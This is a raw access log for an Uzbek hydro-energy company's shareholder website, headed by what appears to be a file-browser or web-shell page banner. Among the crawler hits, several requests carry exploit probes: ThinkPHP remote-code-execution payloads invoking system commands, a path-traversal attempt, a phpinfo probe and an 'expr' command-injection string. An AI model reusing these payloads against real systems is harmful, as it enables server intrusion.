Your IP : 216.73.216.139


Current Path : /home/uzgidenergo/access-logs/
Upload File :
Current File : /home/uzgidenergo/access-logs/mirobod.uzbekgidroenergoqurilish.uz-ssl_log

185.191.171.3 - - [24/Aug/2026:17:09:46 +0500] "GET /material-facts/433-mu-im-fakt-036-affillangan-shakhslar-r-jkhatidagi-zgarishlar-2 HTTP/1.1" 200 139559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.132.186.194 - - [24/Aug/2026:17:11:07 +0500] "GET / HTTP/1.1" 200 46364 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.186.194 - - [24/Aug/2026:17:11:15 +0500] "GET /templates/yoo_master2/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.186.194 - - [24/Aug/2026:17:11:20 +0500] "GET /templates/yoo_master2/apple_touch_icon.png HTTP/1.1" 200 13505 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
34.171.68.95 - - [24/Aug/2026:17:18:08 +0500] "GET /docs/2026/kpe-3-2026.xls HTTP/1.1" 200 334336 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:17:22:00 +0500] "GET /jsc-docs?format=feed&type=atom HTTP/1.1" 200 120403 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.193 - - [24/Aug/2026:17:24:59 +0500] "GET /?function=call_user_func_array&s=%2FIndex%2F%20hink%EF%BF%BDpp%2Finvokefunction&start=18&vars%5B0%5D=md5&vars%5B1%5D%5B0%5D=HelloThinkPHP21 HTTP/1.1" 200 47165 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.30.223.149 - - [24/Aug/2026:17:28:06 +0500] "GET /component/search/?Itemid=291&format=opensearch&template=accessibility HTTP/1.1" 200 755 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:17:30:12 +0500] "GET /info-for-shareholders/496-meeting-15-03-2021?print=1&tmpl=component HTTP/1.1" 200 12852 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:17:32:48 +0500] "GET /component/mailto/?link=c1f6b48a6c8f7b1272e417646372d599708d4002&template=yoo_master2&tmpl=component HTTP/1.1" 200 13431 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
98.84.70.201 - - [24/Aug/2026:17:34:01 +0500] "GET /polls HTTP/1.1" 200 45558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
85.208.96.211 - - [24/Aug/2026:17:37:59 +0500] "GET /?function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B0%5D=HelloThinkPHP21 HTTP/1.1" 200 46578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [24/Aug/2026:17:38:31 +0500] "GET /?start=36&template=accessibility HTTP/1.1" 200 34373 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [24/Aug/2026:17:38:55 +0500] "GET /?pid=0&start=18&uid=0&url=test HTTP/1.1" 200 46810 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [24/Aug/2026:17:42:01 +0500] "GET /?instawp-database-manager=%2F..%2F..%2F..%2F.%2Fmigrate%2Ftemplates%2Fdebug%2Fdb-table&start=42 HTTP/1.1" 200 48797 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:17:43:45 +0500] "GET /material-facts/638-sush-fakt-08-23-03-2026-io-doc HTTP/1.1" 200 37912 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:17:45:19 +0500] "GET /material-facts/562-such-fakt-06-15-03-2023 HTTP/1.1" 200 131433 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
136.119.35.120 - - [24/Aug/2026:17:50:03 +0500] "GET /affiliates-uzb/73-for-shareholders/affiliates?format=feed&type=rss HTTP/1.1" 200 47440 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:17:50:23 +0500] "GET /info-for-shareholders/402-obsh-sobr-03-10-16 HTTP/1.1" 200 41084 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.209 - - [24/Aug/2026:17:51:43 +0500] "GET /?app=main&start=12 HTTP/1.1" 200 46665 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [24/Aug/2026:17:56:04 +0500] "GET /?start=48&yandex-source=ru.yandex.yandexmaps%20expr%20954945194%20%20%20808042689 HTTP/1.1" 200 49929 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:17:59:19 +0500] "GET /jsc-docs?format=feed&template=accessibility&type=atom HTTP/1.1" 200 120430 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:17:59:46 +0500] "GET /component/search/?Itemid=279&format=opensearch&template=accessibility HTTP/1.1" 200 755 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.6 - - [24/Aug/2026:18:02:50 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [24/Aug/2026:18:02:51 +0500] "GET /?app=main&start=54 HTTP/1.1" 200 51364 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.171.68.95 - - [24/Aug/2026:18:04:02 +0500] "GET /component/search/?format=opensearch&template=accessibility HTTP/1.1" 200 740 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.203 - - [24/Aug/2026:18:08:27 +0500] "GET /?function=call_user_func_array&s=%2Findex%2Fthink%2Fapp%2Finvokefunction&start=48&vars%5B0%5D=system&vars%5B1%5D%5B0%5D=echo%20thinkphp%20%7C%20rev HTTP/1.1" 200 50199 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.54.249.218 - - [24/Aug/2026:18:10:40 +0500] "GET /polls/438-meeting-12-04-18 HTTP/1.1" 200 37841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.14 - - [24/Aug/2026:18:10:43 +0500] "GET /about-org/direction HTTP/1.1" 200 39066 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.72.236 - - [24/Aug/2026:18:10:51 +0500] "GET / HTTP/1.1" 200 46106 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.171.68.95 - - [24/Aug/2026:18:11:20 +0500] "GET /material-facts/561-such-fakt-36-15-03-2023 HTTP/1.1" 200 154381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:18:11:32 +0500] "GET /jsc-docs/407-inform-pol-03-10-16?print=1&tmpl=component HTTP/1.1" 200 32497 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
66.249.72.236 - - [24/Aug/2026:18:11:39 +0500] "GET / HTTP/1.1" 200 46106 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.237 - - [24/Aug/2026:18:13:06 +0500] "GET / HTTP/1.1" 200 46106 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:18:18:03 +0500] "GET /docs/2022/performance_bp-2020.docx HTTP/1.1" 200 32677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.42.229.145 - - [24/Aug/2026:18:18:06 +0500] "GET /component/mailto/?link=1ed3bba48205b2aa4517db82776738fb501a4a97&template=yoo_master2&tmpl=component HTTP/1.1" 200 13431 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:18:20:00 +0500] "GET /info-for-shareholders?template=yoo_master2 HTTP/1.1" 200 51754 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.42.229.145 - - [24/Aug/2026:18:21:14 +0500] "GET /material-facts/425-mu-im-fakt-t-risida-akhborot-2 HTTP/1.1" 200 51936 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:18:22:55 +0500] "GET /component/search/?Itemid=298&format=opensearch HTTP/1.1" 200 726 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:18:26:30 +0500] "GET /component/search/?Itemid=273&catid=55&format=opensearch&id=633 HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
207.180.226.38 - - [24/Aug/2026:18:28:38 +0500] "GET /templates/yoo_master2/apple_touch_icon.png HTTP/1.1" 200 13505 "-" "bari.uz logo fetcher"
3.18.186.238 - - [24/Aug/2026:18:28:58 +0500] "GET / HTTP/1.1" 200 46094 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
185.191.171.2 - - [24/Aug/2026:18:34:22 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [24/Aug/2026:18:34:23 +0500] "GET /?pid=0&start=30&uid=0&url=test HTTP/1.1" 200 48677 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:18:34:38 +0500] "GET /jsc-docs/609-comply-or-explain?print=1&tmpl=component HTTP/1.1" 200 8088 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.10 - - [24/Aug/2026:18:35:23 +0500] "GET /?page=home&start=36 HTTP/1.1" 200 46565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.61.96.6 - - [24/Aug/2026:18:35:36 +0500] "GET /docs/2026/biznes-plan-2026.pdf HTTP/1.1" 200 983036 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.7 - - [24/Aug/2026:18:39:26 +0500] "GET /?app=main&start=42 HTTP/1.1" 200 49112 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [24/Aug/2026:18:39:59 +0500] "GET /polls HTTP/1.1" 200 45673 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:18:39:59 +0500] "GET /material-facts/519-such-fakt-06-15-03-2022 HTTP/1.1" 200 145482 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
52.204.71.8 - - [24/Aug/2026:18:45:31 +0500] "GET /about-org/indexes/643-balans-6-2026-mb-doc HTTP/1.1" 200 37628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:18:47:13 +0500] "GET /component/search/?Itemid=354&catid=88&format=opensearch&id=370 HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:18:49:38 +0500] "GET /jsc-docs/543-pol-io-2022-uz-doc?print=1&tmpl=component HTTP/1.1" 200 7944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.211 - - [24/Aug/2026:18:51:29 +0500] "GET /?start=30&yandex-source=ru.yandex.yandexmaps%20expr%20954945194%20%20%20808042689 HTTP/1.1" 200 48004 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:18:53:06 +0500] "GET /about-org/indexes/642-kpe-6-2026-xls HTTP/1.1" 200 37715 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:18:54:09 +0500] "GET /polls?start=10&template=accessibility HTTP/1.1" 200 34222 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:18:54:42 +0500] "GET /component/mailto/?link=2c5bb07604cb5ebb806fa215f396f88ff6e3c01b&template=yoo_master2&tmpl=component HTTP/1.1" 200 13431 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:18:57:59 +0500] "GET /comissions?template=yoo_master2 HTTP/1.1" 200 41242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:18:58:15 +0500] "GET /invest?template=accessibility HTTP/1.1" 200 29355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:19:00:36 +0500] "GET /component/mailto/?link=05f605aa0dacaea4ef50d38f47b5866506c2f3cb&template=yoo_master2&tmpl=component HTTP/1.1" 200 13431 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:19:02:05 +0500] "GET /about-org/indexes/635-balans-2025-doc?print=1&tmpl=component HTTP/1.1" 200 8142 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:19:02:30 +0500] "GET /material-facts/437-mu-im-fakt-08-taftish-komissiyasi-izhroiya-organining-shakhsij-tarkibidagi-uzgarishlar-2 HTTP/1.1" 200 63034 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:19:02:52 +0500] "GET /jsc-docs/398-obsh-sobr-04-07-14 HTTP/1.1" 200 99552 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.197.28.78 - - [24/Aug/2026:19:03:31 +0500] "GET /about-org/the-subject-and-purpose-of-society-uz?template=accessibility HTTP/1.1" 200 36100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.17 - - [24/Aug/2026:19:03:59 +0500] "GET /?function=call_user_func_array&s=%2FIndex%2F%20hink%20pp%2F&start=30 HTTP/1.1" 200 47995 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.196 - - [24/Aug/2026:19:09:33 +0500] "GET /?phpinfo=1&start=18 HTTP/1.1" 200 45811 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
136.119.35.120 - - [24/Aug/2026:19:12:13 +0500] "GET /component/search/?Itemid=283&catid=68&format=opensearch&id=571 HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:19:12:51 +0500] "GET /docs/2026/sush_fakt-06-23.03.2026.doc HTTP/1.1" 200 136192 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:19:14:41 +0500] "GET /material-facts/443-sush-fakt-08-18-09-2018-ks HTTP/1.1" 200 56549 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.18 - - [24/Aug/2026:19:21:14 +0500] "GET /?module=users%2Flogin&start=54 HTTP/1.1" 200 50685 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.56.53.225 - - [24/Aug/2026:19:21:20 +0500] "GET /component/search/?Itemid=283&catid=68&format=opensearch&id=383 HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
51.83.7.88 - - [24/Aug/2026:19:23:14 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:23:16 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=7ca62b36fac2404d148b218ce085ba4932d792c5 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:24:03 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=8069639e52ff513c36b49a4261ec3b1c6964b0c4 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:25:32 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=8994e80b94ad295871c016eeaa75da017ead19b4 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:26:31 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=ecf9e04eb7a233141425d8e6e25e079fc844b71b HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:27:15 +0500] "GET /component/mijopolls/?template=yoo_master2 HTTP/1.1" 200 39552 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.171.68.95 - - [24/Aug/2026:19:28:34 +0500] "GET /component/mailto/?link=c465da28db750cbc90e5b02f3e7cc25621c1d66d&template=accessibility&tmpl=component HTTP/1.1" 200 12935 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
51.83.7.88 - - [24/Aug/2026:19:29:12 +0500] "GET /dividends?template=yoo_master2 HTTP/1.1" 200 43164 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:30:39 +0500] "GET /info-for-shareholders/348-meeting-08-06-15?tmpl=component&print=1 HTTP/1.1" 200 9643 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.83.7.88 - - [24/Aug/2026:19:31:41 +0500] "GET /info-for-shareholders/355-2?tmpl=component&print=1 HTTP/1.1" 200 12160 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.171.68.95 - - [24/Aug/2026:19:31:59 +0500] "GET /polls?start=10&template=yoo_master2 HTTP/1.1" 200 44591 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.16 - - [24/Aug/2026:19:32:14 +0500] "GET /about-org/indexes/590-balans-2023 HTTP/1.1" 200 357604 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
51.83.7.88 - - [24/Aug/2026:19:33:57 +0500] "GET /info-for-shareholders/366-attention-predpr?tmpl=component&print=1 HTTP/1.1" 200 8663 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.56.53.225 - - [24/Aug/2026:19:36:19 +0500] "GET /about-org/the-subject-and-purpose-of-society-uz?print=1&tmpl=component HTTP/1.1" 200 16487 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:19:42:08 +0500] "GET /material-facts/522-such-fakt-08-15-03-2022-rk HTTP/1.1" 200 63550 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:19:42:26 +0500] "GET /component/search/?Itemid=285&catid=70&format=opensearch&id=589 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
66.249.72.237 - - [24/Aug/2026:19:44:14 +0500] "GET /dividends HTTP/1.1" 200 43321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.193 - - [24/Aug/2026:19:48:09 +0500] "GET /?action=login&controller=AuthController&start=30 HTTP/1.1" 200 48437 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [24/Aug/2026:19:49:47 +0500] "GET /prospectus?template=yoo_master2 HTTP/1.1" 200 41803 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.56.53.225 - - [24/Aug/2026:19:49:49 +0500] "GET /affiliates-uzb/63-for-shareholders HTTP/1.1" 200 47243 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
52.45.194.165 - - [24/Aug/2026:19:50:51 +0500] "GET /officially/arkhiv/389-ustav-add-12-04-16 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.3 - - [24/Aug/2026:20:01:12 +0500] "GET /?function=call_user_func_array&s=%2Findex%2Fthink%2Fapp%2Finvokefunction&start=48&vars%5B0%5D=system&vars%5B1%5D%5B0%5D=echo%20thinkphp%20 HTTP/1.1" 200 50376 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [24/Aug/2026:20:08:43 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.205 - - [24/Aug/2026:20:08:44 +0500] "GET /?start=54&yandex-source=desktop-maps HTTP/1.1" 200 50723 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
136.119.35.120 - - [24/Aug/2026:20:12:12 +0500] "GET /audit?print=1&tmpl=component HTTP/1.1" 200 10046 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:20:14:39 +0500] "GET /material-facts/419-mukhim-fakt-08-taftish-komissiyasi-izhroiya-organining-shakhsij-tarkibidagi-uzgarishlar HTTP/1.1" 200 55407 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.10 - - [24/Aug/2026:20:17:11 +0500] "GET /?action=login&controller=AuthController&start=36 HTTP/1.1" 200 46202 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.197 - - [24/Aug/2026:20:26:12 +0500] "GET /?app=main&start=18 HTTP/1.1" 200 46072 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [24/Aug/2026:20:28:56 +0500] "GET /?start=54&yandex-source=ru.yandex.yandexmaps%20expr%20954945194%20%20%20808042689 HTTP/1.1" 200 51267 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:20:32:39 +0500] "GET /component/search/?Itemid=276&format=opensearch HTTP/1.1" 200 726 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:20:37:01 +0500] "GET /dividends?print=1&tmpl=component HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
35.254.159.230 - - [24/Aug/2026:20:36:55 +0500] "GET /material-facts/435-mu-im-fakt-08-zhamiyat-direktori-izhroiya-organining-shakhsij-tarkibidagi-uzgarishlar HTTP/1.1" 200 55126 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
